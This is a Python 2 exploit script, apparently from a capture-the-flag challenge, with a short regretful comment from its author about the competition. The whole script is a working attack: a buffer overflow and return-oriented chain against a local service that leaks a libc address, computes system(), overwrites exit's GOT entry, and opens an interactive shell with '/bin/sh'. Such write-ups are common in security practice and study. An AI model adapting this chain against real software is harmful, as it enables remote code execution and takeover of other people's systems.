```python
#!/usr/bin/python
from socket import *
from struct import *
from time import sleep

# Utils
p = lambda x : pack("<L",x)
up= lambda x : unpack("<L",x)[0]

# Functions
read = 0x10710
puts = 0x1054c

# Data
exit_got = 0x2128c
exit_plt = 0x10570
__libc_main_start_got = 0x21284
__libc_main_start_glibc = 0
system_glibc = 0
data = 0x212b8

# Gadget
ppr = 0x109ac
#load_arg = 0x10f26
load_arg = 0x10f24
load_reg = 0x10f3c

# Payloads
p1 = ''
p1 += 'a'*172
p1 += p(ppr)

p2 = ''
p2 += p(0xdeadbeef)
p2 += p(load_reg)
p2 += p(puts) #pc
p2 += "A"*12
p2 += p(__libc_main_start_got)
p2 += "CCCC"
p2 += "DDDD"
p2 += p(load_arg)

p2 += "A"*28
p2 += p(load_reg)
p2 += p(read)
p2 += "A"*12
p2 += p(exit_got)
p2 += "CCCC"
p2 += "DDDD"
p2 += p(load_arg)

p2 += "A"*28
p2 += p(load_reg)
p2 += p(read)
p2 += "A"*12
p2 += p(data)
p2 += "CCCC"
p2 += "DDDD"
p2 += p(load_arg)

p2 += "A"*28
p2 += p(load_reg)
p2 += p(exit_plt)
p2 += "A"*12
p2 += p(data)
p2 += "CCCC"
p2 += "DDDD"
p2 += p(load_arg)

# Exploit
s = socket(AF_INET,SOCK_STREAM)
s.connect(('localhost',9999))
print len(p2)
raw_input("GO?")
s.send(p2+"\n");sleep(0.5);s.recv(1024)
s.send(p1+"\n");sleep(0.5);s.recv(1024)
s.send("6\n");sleep(0.5)
l = s.recv(1024).split("bye\n")[1]
__libc_main_start_glibc = up(l[:4])
print "[+] __libc_main_start : "+hex(__libc_main_start_glibc)
__libc_main = __libc_main_start_glibc - 0x1680c # offset
system_glibc = __libc_main + 0x2c770
print "[+] System Offset Calculated : "+hex(system_glibc)
s.send(p(system_glibc)+"\n");sleep(0.5)
s.send("/bin/sh\n")
print "[*] SHELL"
while 1:
    s.send(raw_input("$ ")+"\n");sleep(0.5)
    print s.recv(1024)
s.close()
```
Why didn't I look at the stack layout properly during the competition.. ㅠ
I feel so ashamed of myself.